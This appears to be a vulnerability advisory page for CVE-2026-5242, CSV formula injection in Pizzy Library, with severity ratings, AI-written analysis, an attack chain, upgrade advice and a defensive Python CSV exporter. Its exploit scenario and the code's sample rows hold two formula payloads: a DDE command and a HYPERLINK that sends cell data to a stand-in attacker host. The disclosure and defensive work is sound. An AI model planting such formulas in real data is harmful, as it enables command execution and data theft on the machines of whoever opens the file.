
Pizzy Library CVE-2026-5242

EUVD: EUVD-2026-36719 · HIGH
Improper Neutralization of Formula Elements in a CSV File (CWE-1236)
2026-06-15 · TR-CERT · GHSA-qv7c-w6cp-c775
CVSS 3.1 (NVD): 8.8

Severity by source

Vendor (TR-CERT), primary: HIGH (qualitative)
NVD: 8.8 HIGH, AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI: 9.0 CRITICAL

Authenticated input injection (PR:L) over the network; exploitation requires the victim to open the CSV (UI:R), and the impact lands on the spreadsheet host rather than on Pizzy itself (S:C), with full CIA impact.

CVSS 3.1: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from Vendor (TR-CERT).

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Patch available: Jun 15, 2026 16:01 (EUVD)
Analysis generated: Jun 15, 2026 14:31 (vuln.today)

Description (NVD)

Improper neutralization of formula elements in a CSV file vulnerability in MIA Technology Inc. Pizzy Library allows Code Injection.

This issue affects Pizzy Library: from 1.0.0.26250 before 1.3.9.26250.

Analysis (AI)

CSV formula injection in MIA Technology's Pizzy Library (versions 1.0.0.26250 through 1.3.9.26250) allows authenticated attackers to inject malicious formula elements into generated CSV files, leading to code execution when the file is opened in a spreadsheet application. The flaw is rated CVSS 8.8 and was reported by TR-CERT, though no public exploit had been identified at the time of analysis. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Authenticate to Pizzy-backed app
Delivery: Inject formula payload into exportable field
Exploit: Trigger CSV export generation
Install: Victim opens CSV in Excel
C2: Spreadsheet evaluates formula/DDE
Execute: Execute command in victim context
Impact: Exfiltrate data or pivot

Vulnerability Assessment (AI)

Exploitation requires: (1) authenticated write access to a field that Pizzy Library subsequently serializes into a CSV export, consistent with CVSS PR:L; (2) a victim who downloads the generated CSV and opens it in a spreadsheet application (Excel, Calc, Sheets) that evaluates formulas (despite UI:N in the vector, CWE-1236 exploitation is gated on this victim action); and (3) a spreadsheet client that either auto-enables formulas/DDE or a user who clicks through the protected-view warning. …
Risk assessment: The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H rates this 8.8 (High), but the vector is internally inconsistent with a classic CSV injection: real exploitation of CWE-1236 requires the victim to open the exported file in a spreadsheet client, which would normally warrant UI:R, and the impact lands on the downstream viewer rather than on the Pizzy host (suggesting a scope change). …
Exploit scenario: An authenticated low-privilege user of an application that embeds Pizzy Library submits a field value such as =cmd|'/c calc'!A1 or =HYPERLINK("http://attacker/?"&A1,"Click") into a record that will later be exported. A finance or admin user downloads the resulting CSV and opens it in Excel, at which point the formula executes, leaking row data over HTTP or invoking DDE to run an arbitrary command in the victim's session.
Remediation: Upgrade Pizzy Library to version 1.3.9.26250 or later, the first fixed release per the affected-range metadata; consult the TR-CERT bulletin at https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0383 for vendor coordination details. …
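What "neutralizing formula elements" looks like on the exporting side, as an added Python illustration that is neither Pizzy Library's code nor part of the vuln.today record: every string cell whose first non-space character is a formula trigger is prefixed with a single quote and every field is double-quoted, so the payload shapes quoted in the exploit scenario above are written out as inert text. The sample rows are constructed; the function and column names are assumptions.

```python
"""Defensive CSV export that neutralizes formula elements (CWE-1236)."""
import csv
import io
from numbers import Number

# Characters that spreadsheet clients treat as the start of a formula.
# Tab and carriage return are included because some clients strip them
# and then evaluate what follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a string that a spreadsheet will display literally.

    Real numbers (int/float, not bool) are emitted as-is so that a negative
    amount such as -5 is not turned into text; every other value is
    stringified and, if it could be read as a formula, prefixed with a
    single quote, which Excel, LibreOffice and Google Sheets treat as a
    text marker rather than evaluating the cell.
    """
    if isinstance(value, Number) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    # Conservative: look past leading spaces, since some clients trim them
    # before deciding whether a cell is a formula.
    if text.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(header, rows):
    """Serialize rows to CSV text with every cell neutralized and quoted.

    QUOTE_ALL wraps each field in double quotes and doubles any embedded
    quote, so a value cannot break out of its own cell.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow([neutralize_cell(h) for h in header])
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: the two payload shapes quoted in the exploit
    # scenario, next to a benign negative amount that must stay numeric.
    sample = [
        ("alice", "=cmd|'/c calc'!A1", -5),
        ("bob", '=HYPERLINK("http://attacker/?"&A1,"Click")', 12.5),
    ]
    print(export_csv(["user", "note", "amount"], sample))
```

The leading apostrophe stays visible in some clients when the CSV is opened directly rather than imported; that is the accepted trade-off for never letting the cell be evaluated.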

Recommended Action (AI)

Within 24 hours: Identify all systems and applications using Pizzy Library versions 1.0.0.26250-1.3.9.26250; publish security advisory cautioning users against opening CSV files from untrusted sources. …


CVE-2026-5242 vulnerability details – vuln.today
